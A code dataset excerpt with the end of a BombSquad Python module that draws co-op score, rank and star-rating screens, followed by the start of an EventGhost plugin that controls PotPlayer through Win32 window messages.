-195\n available = (self._show_info['results'] is not None)\n if self._score is not None:\n ba.timer((1.5 + base_delay),\n ba.WeakCall(self._show_world_rank, offs_x),\n timetype=ba.TimeType.BASE)\n ts_h_offs = 200\n ts_height = 300\n\n # Show world tops.\n if available:\n\n # Show the number of games represented by this\n # list (except for in tournaments).\n if self.session.tournament_id is None:\n Text(ba.Lstr(resource='lastGamesText',\n subs=[\n ('${COUNT}',\n str(self._show_info['results']['total']))\n ]),\n position=(ts_h_offs - 35 + 95,\n ts_height / 2 + 6 + v_offs),\n color=(0.4, 0.4, 0.4, 1.0),\n scale=0.7,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=base_delay + 0.3).autoretain()\n else:\n v_offs += 20\n\n h_offs_extra = 0\n v_offs_names = 0\n scale = 1.0\n p_count = len(self._playerinfos)\n if p_count > 1:\n h_offs_extra -= 40\n if self._score_type != 'points':\n h_offs_extra += 60\n if p_count == 2:\n scale = 0.9\n elif p_count == 3:\n scale = 0.65\n elif p_count == 4:\n scale = 0.5\n\n # Make sure there's at least 10.\n while len(self._show_info['tops']) < 10:\n self._show_info['tops'].append([0, '-'])\n\n times: List[Tuple[float, float]] = []\n for i in range(len(self._show_info['tops'])):\n times.insert(\n random.randrange(0,\n len(times) + 1),\n (base_delay + i * 0.05, base_delay + 0.4 + i * 0.05))\n for i, tval in enumerate(self._show_info['tops']):\n score = int(tval[0])\n name_str = tval[1]\n if self._name_str == name_str and self._score == score:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = base_delay + 1.0\n tdelay2 = base_delay + 1.0\n else:\n flash = False\n if self._name_str == name_str:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.9, 1.0, 0.9, 1.0)\n else:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n\n if name_str != '-':\n Text(str(score) if self._score_type == 'points' else\n ba.timestring(\n score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS),\n 
position=(ts_h_offs + 20 + h_offs_extra,\n ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_LEFT,\n transition_delay=tdelay1).autoretain()\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n ts_height / 2 + -ts_height * (i + 1) / 10 +\n v_offs_names + v_offs + 11.0),\n maxwidth=80.0 + 100.0 * len(self._playerinfos),\n v_align=Text.VAlign.CENTER,\n color=color1,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_LEFT,\n transition_delay=tdelay2).autoretain()\n\n def _show_tips(self) -> None:\n from bastd.actor.tipstext import TipsText\n TipsText(offs_y=30).autoretain()\n\n def _update_tournament_time_remaining_text(self) -> None:\n if self._tournament_time_remaining is None:\n return\n self._tournament_time_remaining = max(\n 0, self._tournament_time_remaining - 1)\n if self._tournament_time_remaining_text is not None:\n val = ba.timestring(self._tournament_time_remaining,\n suppress_format_warning=True,\n centi=False)\n self._tournament_time_remaining_text.node.text = val\n\n def _show_world_rank(self, offs_x: float) -> None:\n # FIXME: Tidy this up.\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-statements\n from ba.internal import get_tournament_prize_strings\n assert self._show_info is not None\n available = (self._show_info['results'] is not None)\n\n if available:\n error = (self._show_info['results']['error']\n if 'error' in self._show_info['results'] else None)\n rank = self._show_info['results']['rank']\n total = self._show_info['results']['total']\n rating = (10.0 if total == 1 else 10.0 * (1.0 - (float(rank - 1) /\n (total - 1))))\n player_rank = self._show_info['results']['playerRank']\n best_player_rank = self._show_info['results']['bestPlayerRank']\n else:\n error = False\n rating = None\n player_rank = None\n best_player_rank = None\n\n # If we've got tournament-seconds-remaining, show it.\n if self._tournament_time_remaining is not None:\n Text(ba.Lstr(resource='coopSelectWindow.timeRemainingText'),\n position=(-360, -70 - 100),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.8,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n self._tournament_time_remaining_text = Text(\n '',\n position=(-360, -110 - 100),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=1.6,\n maxwidth=150,\n transition_delay=2.0)\n\n # If we're a tournament, show prizes.\n try:\n tournament_id = self.session.tournament_id\n if tournament_id is not None:\n if tournament_id in ba.app.tournament_info:\n tourney_info = ba.app.tournament_info[tournament_id]\n # pylint: disable=unbalanced-tuple-unpacking\n pr1, pv1, pr2, pv2, pr3, pv3 = (\n get_tournament_prize_strings(tourney_info))\n # pylint: enable=unbalanced-tuple-unpacking\n Text(ba.Lstr(resource='coopSelectWindow.prizesText'),\n position=(-360, -70 + 77),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=1.0,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n vval = -107 + 70\n for rng, val in ((pr1, pv1), (pr2, pv2), (pr3, pv3)):\n Text(rng,\n position=(-410 + 10, vval),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n 
transition=Text.Transition.FADE_IN,\n scale=0.6,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n Text(val,\n position=(-390 + 10, vval),\n color=(0.7, 0.7, 0.7, 1.0),\n h_align=Text.HAlign.LEFT,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.8,\n maxwidth=300,\n transition_delay=2.0).autoretain()\n vval -= 35\n except Exception:\n ba.print_exception('Error showing prize ranges.')\n\n if self._do_new_rating:\n if error:\n ZoomText(ba.Lstr(resource='failText'),\n flash=True,\n trail=True,\n scale=1.0 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -60),\n maxwidth=200,\n jitter=1.0).autoretain()\n Text(ba.Lstr(translate=('serverResponses', error)),\n position=(0, -140),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.9,\n maxwidth=400,\n transition_delay=1.0).autoretain()\n else:\n ZoomText((('#' + str(player_rank)) if player_rank is not None\n else ba.Lstr(resource='unavailableText')),\n flash=True,\n trail=True,\n scale=1.0 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -60),\n maxwidth=200,\n jitter=1.0).autoretain()\n\n Text(ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='rankText'))]),\n position=(0, 36),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n if best_player_rank is not None:\n Text(ba.Lstr(resource='currentStandingText',\n fallback_resource='bestRankText',\n subs=[('${RANK}', str(best_player_rank))]),\n position=(0, -155),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=1.0).autoretain()\n else:\n ZoomText((f'{rating:.1f}' if available else ba.Lstr(\n resource='unavailableText')),\n flash=True,\n trail=True,\n scale=0.6 if available else 0.333,\n tilt_translate=0.11,\n h_align='center',\n position=(190 + offs_x, -94),\n maxwidth=200,\n jitter=1.0).autoretain()\n\n if available:\n if rating >= 9.5:\n stars = 3\n elif rating >= 7.5:\n stars = 2\n elif rating > 0.0:\n stars = 1\n else:\n stars = 0\n star_tex = ba.gettexture('star')\n star_x = 135 + offs_x\n for _i in range(stars):\n img = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (star_x, -16),\n 'scale': (62, 62),\n 'opacity': 1.0,\n 'color': (2.2, 1.2, 0.3),\n 'absolute_scale': True\n })).autoretain()\n\n assert img.node\n ba.animate(img.node, 'opacity', {0.15: 0, 0.4: 1})\n star_x += 60\n for _i in range(3 - stars):\n img = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (star_x, -16),\n 'scale': (62, 62),\n 'opacity': 1.0,\n 'color': (0.3, 0.3, 0.3),\n 'absolute_scale': True\n })).autoretain()\n assert img.node\n ba.animate(img.node, 'opacity', {0.15: 0, 0.4: 1})\n star_x += 60\n\n def dostar(count: int, xval: float, offs_y: float,\n score: str) -> None:\n Text(score + ' =',\n position=(xval, -64 + offs_y),\n color=(0.6, 0.6, 0.6, 0.6),\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.4,\n transition_delay=1.0).autoretain()\n stx = xval + 20\n for _i2 in range(count):\n img2 = ba.NodeActor(\n ba.newnode('image',\n attrs={\n 'texture': star_tex,\n 'position': (stx, -64 + offs_y),\n 'scale': (12, 12),\n 'opacity': 0.7,\n 'color': (2.2, 1.2, 0.3),\n 'absolute_scale': True\n })).autoretain()\n assert 
img2.node\n ba.animate(img2.node, 'opacity', {1.0: 0.0, 1.5: 0.5})\n stx += 13.0\n\n dostar(1, -44 - 30, -112, '0.0')\n dostar(2, 10 - 30, -112, '7.5')\n dostar(3, 77 - 30, -112, '9.5')\n try:\n best_rank = self._campaign.getlevel(self._level_name).rating\n except Exception:\n best_rank = 0.0\n\n if available:\n Text(ba.Lstr(\n resource='outOfText',\n subs=[('${RANK}',\n str(int(self._show_info['results']['rank']))),\n ('${ALL}', str(self._show_info['results']['total']))\n ]),\n position=(0, -155 if self._newly_complete else -145),\n color=(1, 1, 1, 0.7),\n h_align=Text.HAlign.CENTER,\n transition=Text.Transition.FADE_IN,\n scale=0.55,\n transition_delay=1.0).autoretain()\n\n new_best = (best_rank > self._old_best_rank and best_rank > 0.0)\n was_string = ba.Lstr(value=' ${A}',\n subs=[('${A}',\n ba.Lstr(resource='scoreWasText')),\n ('${COUNT}', str(self._old_best_rank))])\n if not self._newly_complete:\n Text(ba.Lstr(value='${A}${B}',\n subs=[('${A}',\n ba.Lstr(resource='newPersonalBestText')),\n ('${B}', was_string)]) if new_best else\n ba.Lstr(resource='bestRatingText',\n subs=[('${RATING}', str(best_rank))]),\n position=(0, -165),\n color=(1, 1, 1, 0.7),\n flash=new_best,\n h_align=Text.HAlign.CENTER,\n transition=(Text.Transition.IN_RIGHT\n if new_best else Text.Transition.FADE_IN),\n scale=0.5,\n transition_delay=1.0).autoretain()\n\n Text(ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='ratingText'))]),\n position=(0, 36),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n if not error:\n ba.timer(0.35, ba.Call(ba.playsound, self.cymbal_sound))\n\n def _show_fail(self) -> None:\n ZoomText(ba.Lstr(resource='failText'),\n maxwidth=300,\n flash=False,\n trail=True,\n h_align='center',\n tilt_translate=0.11,\n position=(0, 40),\n jitter=1.0).autoretain()\n if self._fail_message is not None:\n Text(self._fail_message,\n h_align=Text.HAlign.CENTER,\n position=(0, -130),\n maxwidth=300,\n color=(1, 1, 1, 0.5),\n transition=Text.Transition.FADE_IN,\n transition_delay=1.0).autoretain()\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n\n def _show_score_val(self, offs_x: float) -> None:\n assert self._score_type is not None\n assert self._score is not None\n ZoomText((str(self._score) if self._score_type == 'points' else\n ba.timestring(self._score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS)),\n maxwidth=300,\n flash=True,\n trail=True,\n scale=1.0 if self._score_type == 'points' else 0.6,\n h_align='center',\n tilt_translate=0.11,\n position=(190 + offs_x, 115),\n jitter=1.0).autoretain()\n Text(ba.Lstr(\n value='${A}:', subs=[('${A}', ba.Lstr(\n resource='finalScoreText'))]) if self._score_type == 'points'\n else ba.Lstr(value='${A}:',\n subs=[('${A}', ba.Lstr(resource='finalTimeText'))]),\n maxwidth=300,\n position=(0, 200),\n transition=Text.Transition.FADE_IN,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n transition_delay=0).autoretain()\n ba.timer(0.35, ba.Call(ba.playsound, self._score_display_sound))\n","sub_path":"assets/src/ba_data/python/bastd/activity/coopscore.py","file_name":"coopscore.py","file_ext":"py","file_size_in_byte":65480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"260594927","text":"# -*- coding: utf-8 -*-\n#\n# plugins/PotPlayer/__init__.py\n#\n# Copyright (C) 2013 Pako\n#\n# This file is a plugin 
for EventGhost.\n# Copyright (C) 2005-2013 Lars-Peter Voss \n#\n# EventGhost is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License version 2 as published by the\n# Free Software Foundation;\n#\n# EventGhost is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n \n# Changelog (in reverse chronological order):\n# -------------------------------------------\n# 0.3 by Pako 2013-12-09 08:31 UTC+1\n# - bugfix (speed control) wrong command ID\n# 0.2 by Pako 2013-11-09 12:31 UTC+1\n# - bugfix (action add/play) when filename contains non-ascii characters too\n# 0.1 by Pako 2013-11-02 13:43 UTC+1\n# - support URL (EventGhost forum) added\n# - add/play file renamed to add/play file/folder\n# 0.0 by Pako 2013-10-22 13:12 UTC+1\n# - initial version\n\neg.RegisterPlugin(\n name = \"PotPlayer\",\n author = \"Pako\",\n version = \"0.3\",\n kind = \"program\",\n guid = \"{F711529C-FE41-4DC7-906D-8D44FF3D62C1}\",\n createMacrosOnAdd = True,\n description = (\n 'Adds actions to control '\n 'PotPlayer.'\n ),\n icon = (\n \"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAByElEQVR42mN0Svz8nwE/\"\n \"eADEB4B44b75vAfQJRlBBvBwMTIoyzGhSDx99ZPh2etfDCxM7AxMjMwwYZABgUCDPqAY\"\n \"oK/BzNBXxonV+hsPvjHsPPqbYf3ufwzMTKwgoQtA7AgzhKAByAa1z/rG8OQFB9gQoAGG\"\n \"JBnw6fNnhuu3HjPUzxJl+P0brDYRaMgCrAZMWPSTwcaIhcFEB+L3Hz9+MDx8/ISBhZmZ\"\n \"4ehlFoaFGwXhrsBqQMecH2BaXJiJwc4Y6My/zxhYWFgY2NjZGH7/YWGIrWIEhwfQAEas\"\n \"BpT3fUdxvqz4b4Yoz79gA9jZ2BhiKr8yvHnHgtsA56QvcDY3UDglmJHB3YaVgRXoCiYm\"\n \"JgavzLcMP3+yYxrw5etXhnfv3jMk1guANUd6AiPdhYVBgJ8N6GRIOvn89S+Db/YnVC/o\"\n \"qjIyVCR9Zfj16xcDG9CJk5ZzMaSFMDPISLCC/Y4Mthz6wtC/AJKogAY4gg3QUPjDUJP2\"\n \"A6iZnYEd6k+QRkZGRhTNINvDSz6AnY8SjdrK/xla8hiAGtkZWFkh/sSWkLrmAqPzKRtm\"\n \"QtJTY2LoKeVgYGbGrpFgUiYhM22AOh01MzHgBw8Y8GRnALMj2BGuN2wjAAAAAElFTkSu\"\n \"QmCC\"\n ),\n url = \"http://www.eventghost.net/forum/viewtopic.php?f=9&t=5738\"\n)\n#===============================================================================\n\nimport eg\nimport wx\nimport _winreg\nfrom os import environ\nfrom os.path import join, exists, isfile, isdir, split\nfrom subprocess import Popen\nfrom eg.WinApi import SendMessageTimeout, WM_COMMAND\nfrom eg.WinApi.Utils import GetMonitorDimensions\nfrom eg.WinApi.Dynamic import PostMessage\nfrom eg.WinApi.Dynamic import CreateEvent, SetEvent\nfrom threading import Timer\nfrom win32gui import GetSubMenu, GetMenuItemCount, GetDlgCtrlID \nfrom win32gui import GetClassName, GetWindowText\nfrom win32gui import SendMessage, FindWindow, IsWindow, GetWindow\nfrom copy import deepcopy as cpy\nfrom time import sleep\nfrom winsound import PlaySound, SND_ASYNC\nfrom ctypes import addressof, c_int, c_buffer\nfrom ctypes import create_string_buffer\nfrom ctypes import byref, sizeof, c_long, c_ulong, Structure\nfrom ctypes.wintypes import WinDLL\n_user32 = WinDLL(\"user32\")\nimport wx.grid as gridlib\nfrom sys import getfilesystemencoding\nFSE = getfilesystemencoding()\nfrom eg.Classes.MainFrame.TreeCtrl import DropTarget as EventDropTarget\n\nARIAL_INFO = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\n\nWM_INITMENUPOPUP = 0x0117\nMF_GRAYED = 1\nMF_DISABLED = 2\nMF_CHECKED = 8\nMF_BYPOSITION = 1024\nMF_SEPARATOR = 2048\nSYS_VSCROLL_X = 
wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)\nSYS_HSCROLL_Y = wx.SystemSettings.GetMetric(wx.SYS_HSCROLL_Y)\narialInfoString = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\nGW_CHILD = 5\nGW_HWNDNEXT = 2\nBN_CLICKED = 0\nWM_SETTEXT = 12\nWM_CLOSE = 16\nEM_GETLINE = 196\nWM_CONTEXTMENU = 0x007B\nOBJID_CLIENT = 0xFFFFFFFC\nMENUsubst = {\n 10059:\"5 Sec.\",\n 10060:\"5 Sec.\",\n 10061:\"30 Sec.\",\n 10062:\"30 Sec.\",\n 10063:\"1 Min.\",\n 10064:\"1 Min.\",\n 10065:\"5 Min.\",\n 10066:\"5 Min.\",\n 10579:\"X Sec.\",\n 10580:\"X Sec.\",\n 10140:\"X Sec.\",\n 10141:\"X Sec.\",\n 10291:\"X Sec.\",\n 10292:\"X Sec.\",\n 10479:\"
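The record above is truncated mid-table, but its mechanism is already visible: MENUsubst maps PotPlayer WM_COMMAND menu-item IDs to short labels, and the plugin's imports (FindWindow, SendMessage, WM_COMMAND) show that control actions boil down to posting one of those IDs to the player's main window. The following standalone sketch, which is not part of the archived plugin record, illustrates that core pattern; the "PotPlayer64" window-class name and the seek behavior of the sample ID are assumptions, not taken from the source.

# Minimal sketch of WM_COMMAND-based control of PotPlayer.
# Assumption: the 64-bit build registers the top-level window class
# "PotPlayer64"; the archived plugin locates the window its own way.
from win32gui import FindWindow, SendMessage

WM_COMMAND = 0x0111  # standard Win32 menu/accelerator command message


def send_potplayer_command(command_id):
    """Send one menu-command ID to a running PotPlayer instance."""
    hwnd = FindWindow("PotPlayer64", None)  # assumed window class name
    if not hwnd:
        raise RuntimeError("PotPlayer window not found")
    # wParam carries the menu-command ID; lParam is 0 for menu items.
    SendMessage(hwnd, WM_COMMAND, command_id, 0)

# Usage: pass an ID from the MENUsubst table, e.g. 10059, which the
# table labels "5 Sec." (presumably a short seek command).
# send_potplayer_command(10059)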